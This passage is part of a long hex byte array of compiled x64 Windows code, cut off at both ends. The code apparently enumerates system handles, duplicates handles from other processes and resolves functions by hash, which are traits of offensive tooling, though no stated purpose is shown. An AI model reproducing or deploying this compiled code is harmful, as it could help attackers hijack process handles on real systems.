,0x47,0x83,0x7D,0x78,0x00,0x74,0x1E,0x48,0x8B,0x95,0x80,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0xB6,0x0C,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x26,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x13,0x48,0x83,0x7D,0xF0,0x00,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x5B,0x2F,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x83,0x7D,0x38,0x00,0x75,0x61,0x83,0x7D,0x20,0x00,0x74,0x19,0x8B,0x4D,0x40,0x8B,0x55,0x18,0x8B,0x45,0x10,0x41,0x89,0xC8,0x89,0xC1,0xE8,0x7C,0x07,0x00,0x00,0x48,0x89,0x45,0xF8,0xEB,0x42,0x83,0x7D,0x28,0x00,0x75,0x3C,0x83,0x7D,0x30,0x00,0x75,0x36,0x83,0x7D,0x10,0x00,0x74,0x1F,0x8B,0x4D,0x40,0x8B,0x55,0x18,0x8B,0x45,0x10,0x41,0x89,0xC9,0x41,0xB8,0x00,0x00,0x00,0x00,0x89,0xC1,0xE8,0xB1,0x00,0x00,0x00,0x48,0x89,0x45,0xF8,0xEB,0x11,0x8B,0x55,0x40,0x8B,0x45,0x18,0x89,0xC1,0xE8,0x0E,0x00,0x00,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x44,0x8B,0x45,0x18,0x8B,0x55,0x10,0x48,0x8D,0x4D,0xF0,0x48,0x89,0x4C,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDA,0x2D,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x1A,0x00,0x00,0x80,0x75,0x25,0x48,0x8D,0x05,0x82,0x9D,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5A,0xCE,0xFF,0xFF,0x48,0x8D,0x05,0x11,0x9D,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4B,0xCE,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x21,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x14,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x76,0xE9,0xFF,0xFF,0x85,0xC0,0x74,0x90,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8B,0x45,0x28,0x89,0x45,0xD8,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0x48,0x89,0x45,0xB0,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x4C,0x8D,0x45,0xB0,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0x18,0x48,0x8D,0x45,0xF0,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xA1,0x2C,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x0B,0x00,0x00,0xC0,0x75,0x30,0x83,0x7D,0x20,0x00,0x75,0x23,0x8B,0x45,0x10,0x89,0xC2,0x48,0x8D,0x05,0xE0,0x9C,0x00,0x00,0x48,0x89,0xC1,0xE8,0x70,0xCD,0xFF,0xFF,0x48,0x8D,0x05,0x27,0x9C,0x00,0x00,0x48,0x89,0xC1,0xE8,0x61,0xCD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4A,0x81,0x7D,0xFC,0x22,0x00,0x00,0xC0,0x75,0x30,0x83,0x7D,0x20,0x00,0x75,0x23,0x8B,0x45,0x10,0x89,0xC2,0x48,0x8D,0x05,0xCF,0x9C,0x00,0x00,0x48,0x89,0xC1,0xE8,0x37,0xCD,0xFF,0xFF,0x48,0x8D,0x05,0xEE,0x9B,0x00,0x00,0x48,0x89,0xC1,0xE8,0x28,0xCD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x11,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE8,0x20,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF8,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0xC3,0x48,0x8B,0x05,0x28,0x18,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x24,0x18,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xD2,0x00,0x00,0x00,0x8B,0x55,0xE8,0x48,0x8D,0x4D,0xE8,0x48,0x8B,0x45,0xF0,0x49,0x89,0xC9,0x41,0x89,0xD0,0x48,0x89,0xC2,0xB9,0x10,0x00,0x00,0x00,0xE8,0x0A,0x30,0x00,0x00,0x89,0x45,0xEC,0x81,0x7D,0xEC,0x04,0x00,0x00,0xC0,0x75,0x7C,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC3,0x75,0x00,0x00,0x48,0x8B,0x05,0xB4,0x17,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xB4,0x17,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF8,0x8B,0x45,0xE8,0x89,0xC3,0x48,0x8B,0x05,0x80,0x17,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x7C,0x17,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xEB,0x2D,0x83,0x7D,0xEC,0x00,0x79,0x08,0xEB,0x25,0x90,0xE9,0x4C,0xFF,0xFF,0xFF,0x90,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x28,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x50,0x48,0x83,0x7D,0xF0,0x00,0x74,0x49,0x48,0x83,0x7D,0xF0,0x00,0x74,0x42,0x8B,0x45,0xE8,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0B,0x75,0x00,0x00,0x48,0x8B,0x05,0xFC,0x16,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xFC,0x16,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x48,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x1B,0x48,0x8B,0x45,0x10,0x8B,0x55,0xFC,0x8B,0x44,0x90,0x04,0x39,0x45,0x18,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x14,0x83,0x45,0xFC,0x01,0x48,0x8B,0x45,0x10,0x8B,0x00,0x39,0x45,0xFC,0x72,0xDA,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x61,0x16,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x24,0x4E,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x5A,0x16,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0xC1,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xE9,0x92,0x00,0x00,0x00,0x8B,0x55,0xF8,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x8B,0x55,0x10,0x48,0x01,0xD0,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x0F,0xB7,0x00,0x0F,0xB7,0xD0,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x28,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x55,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xC0,0x01,0x3D,0x88,0x13,0x00,0x00,0x76,0x20,0x48,0x8D,0x05,0x2D,0x9A,0x00,0x00,0x48,0x89,0xC1,0xE8,0x75,0xCA,0xFF,0xFF,0x48,0x8D,0x05,0x2C,0x99,0x00,0x00,0x48,0x89,0xC1,0xE8,0x66,0xCA,0xFF,0xFF,0xEB,0x4D,0x48,0x8B,0x45,0xE8,0x44,0x0F,0xB7,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x8D,0x48,0x01,0x48,0x8B,0x55,0xF0,0x89,0x0A,0x41,0x0F,0xB7,0xC8,0x48,0x8B,0x55,0xF0,0x89,0xC0,0x89,0x4C,0x82,0x04,0x83,0x45,0xF8,0x01,0x48,0x8B,0x45,0x10,0x8B,0x00,0x39,0x45,0xF8,0x0F,0x82,0x5F,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x18,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x4E,0x48,0x83,0x7D,0xF0,0x00,0x74,0x47,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x48,0x8B,0x45,0xF0,0x41,0xB8,0x24,0x4E,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x54,0x73,0x00,0x00,0x48,0x8B,0x05,0x45,0x15,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x45,0x15,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xEC,0x00,0x10,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xF8,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x45,0xF8,0x8B,0x45,0xEC,0x89,0xC3,0x48,0x8B,0x05,0xD9,0x14,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD5,0x14,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA2,0x00,0x00,0x00,0x8B,0x4D,0xEC,0x48,0x8B,0x55,0xF0,0x48,0x8D,0x45,0xEC,0x48,0x89,0x44,0x24,0x20,0x41,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x03,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xE8,0x5F,0x2D,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x78,0x1B,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0x8B,0x55,0xEC,0x48,0x8B,0x45,0x28,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x59,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x4F,0x72,0x00,0x00,0x48,0x8B,0x05,0x40,0x14,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x40,0x14,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xFC,0x04,0x00,0x00,0xC0,0x0F,0x84,0x26,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xDC,0x48,0x8D,0x45,0xE0,0x48,0x89,0xC1,0xE8,0xA3,0xFE,0xFF,0xFF,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x74,0x72,0x48,0x8B,0x45,0xE0,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xF0,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xEB,0x50,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x08,0x48,0x8B,0x55,0x20,0x48,0x89,0xC1,0x48,0x8B,0x05,0x39,0x14,0x01,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x15,0x8B,0x45,0xEC,0x8D,0x50,0x02,0x48,0x8B,0x45,0x28,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x2D,0x48,0x8B,0x45,0xF0,0x0F,0xB7,0x40,0x02,0x0F,0xB7,0xC0,0x48,0x83,0xC0,0x07,0x48,0x83,0xE0,0xF8,0x48,0x83,0xC0,0x68,0x48,0x01,0x45,0xF0,0x83,0x45,0xEC,0x01,0x48,0x8B,0x45,0xE0,0x8B,0x00,0x39,0x45,0xEC,0x72,0xA5,0xEB,0x01,0x90,0x48,0x8B,0x45,0xE0,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xE0,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xDC,0x89,0xC2,0x48,0x8B,0x45,0xE0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1E,0x71,0x00,0x00,0x48,0x8B,0x5D,0xE0,0x48,0x8B,0x05,0x0B,0x13,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x0F,0x13,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0xB8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xB0,0x00,0x00,0x00,0x89,0x4D,0x20,0x89,0x55,0x28,0x44,0x89,0x45,0x30,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xA4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x94,0x48,0x89,0xC2,0x48,0x8D,0x05,0xC1,0x95,0x00,0x00,0x48,0x89,0xC1,0xE8,0x54,0xFE,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x49,0x02,0x00,0x00,0x48,0x8D,0x55,0xA4,0x48,0x8D,0x45,0xA8,0x48,0x89,0xC1,0xE8,0xD2,0xF9,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x2F,0x02,0x00,0x00,0x48,0x8B,0x45,0xA8,0x48,0x8D,0x55,0x98,0x48,0x89,0xC1,0xE8,0x98,0xFB,0xFF,0xFF,0x89,0x45,0xD8,0x83,0x7D,0xD8,0x00,0x0F,0x84,0x15,0x02,0x00,0x00,0xC7,0x45,0xC4,0x40,0x00,0x00,0x00,0x8B,0x45,0xC4,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xB8,0x89,0x45,0xD0,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0xAF,0x01,0x00,0x00,0x48,0x8B,0x45,0x98,0x8B,0x55,0xE4,0x8B,0x44,0x90,0x04,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x3B,0x45,0xD0,0x0F,0x84,0x87,0x01,0x00,0x00,0x8B,0x45,0xD4,0x3B,0x45,0x20,0x0F,0x84,0x7E,0x01,0x00,0x00,0x83,0x7D,0xD4,0x00,0x0F,0x84,0x77,0x01,0x00,0x00,0x83,0x7D,0xD4,0x04,0x0F,0x84,0x70,0x01,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0x24,0x01,0x00,0x00,0x48,0x8B,0x4D,0xA8,0x8B,0x55,0xE0,0x48,0x89,0xD0,0x48,0x01,0xC0,0x48,0x01,0xD0,0x48,0xC1,0xE0,0x03,0x48,0x01,0xC8,0x48,0x83,0xC0,0x08,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0xC8,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x39,0x45,0xD4,0x0F,0x85,0xE4,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x0F,0xB6,0x40,0x04,0x0F,0xB6,0xD0,0x8B,0x45,0x94,0x39,0xC2,0x0F,0x85,0xD1,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x8B,0x40,0x10,0x23,0x45,0x28,0x39,0x45,0x28,0x0F,0x85,0xC1,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x75,0x2A,0x8B,0x45,0xD4,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x01,0x00,0x00,0x00,0xBA,0x40,0x00,0x00,0x00,0x89,0xC1,0xE8,0xA5,0xF7,0xFF,0xFF,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0xA9,0x00,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xC0,0x49,0x89,0xC2,0x48,0x8D,0x4D,0xB0,0x48,0x8B,0x45,0xE8,0xC7,0x44,0x24,0x30,0x02,0x00,0x00,0x00,0x8B,0x55,0x30,0x89,0x54,0x24,0x28,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x4C,0x89,0xD2,0x48,0x89,0xC1,0xE8,0x45,0x29,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x78,0x40,0x48,0x8B,0x45,0xB0,0x48,0x89,0xC1,0xE8,0x9F,0xE0,0xFF,0xFF,0x85,0xC0,0x74,0x11,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xB0,0x48,0x89,0x45,0xF0,0xEB,0x36,0x48,0x8B,0x45,0xB0,0x48,0x89,0xC1,0xE8,0x49,0x25,0x00,0x00,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xE0,0x01,0x48,0x8B,0x45,0xA8,0x8B,0x00,0x39,0x45,0xE0,0x0F,0x82,0xCD,0xFE,0xFF,0xFF,0xEB,0x01,0x90,0x48,0x83,0x7D,0xE8,0x00,0x74,0x20,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0x0C,0x25,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xE4,0x01,0x83,0x7D,0xFC,0x00,0x75,0x0F,0x48,0x8B,0x45,0x98,0x8B,0x00,0x39,0x45,0xE4,0x0F,0x82,0x3C,0xFE,0xFF,0xFF,0x83,0x7D,0xFC,0x00,0x75,0x29,0x48,0x8D,0x05,0xA4,0x94,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB4,0xC4,0xFF,0xFF,0x48,0x8D,0x05,0x6B,0x93,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA5,0xC4,0xFF,0xFF,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xA8,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0xA8,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xA4,0x89,0xC2,0x48,0x8B,0x45,0xA8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD6,0x6D,0x00,0x00,0x48,0x8B,0x5D,0xA8,0x48,0x8B,0x05,0xC3,0x0F,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC7,0x0F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x98,0x48,0x85,0xC0,0x74,0x49,0x48,0x8B,0x45,0x98,0x48,0x85,0xC0,0x74,0x40,0x48,0x8B,0x45,0x98,0x41,0xB8,0x24,0x4E,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x84,0x6D,0x00,0x00,0x48,0x8B,0x5D,0x98,0x48,0x8B,0x05,0x71,0x0F,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x75,0x0F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x0C,0x48,0x8B,0x45,0xE8,0x48,0x89,0xC1,0xE8,0xF6,0x23,0x00,0x00,0x83,0x7D,0xFC,0x00,0x74,0x06,0x48,0x8B,0x45,0xF0,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0x48,0x81,0xC4,0xB8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0x90,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x83,0x7D,0x10,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBF,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0xC7,0x45,0xFC,0x01,0x00,0x00,0xC0,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x8B,0x45,0x18,0x89,0x45,0xD8,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8B,0x4D,0x10,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x04,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x10,0x48,0x89,0xC1,0xE8,0x3A,0x26,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x08,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x05,0x23,0x00,0x00,0x48,0xC7,0x45,0x10,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x81,0xC4,0x90,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0xFD,0x00,0x00,0x00,0x48,0x83,0x7D,0x18,0x00,0x0F,0x84,0xF2,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x96,0x92,0x00,0x00,0x48,0x89,0xC1,0xE8,0x51,0xE5,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xDB,0xFD,0x4F,0xE5,0x48,0x89,0xC1,0xE8,0x5F,0xE3,0xFF,0xFF,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x0F,0x84,0xBF,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x44,0x8B,0x45,0xF4,0x8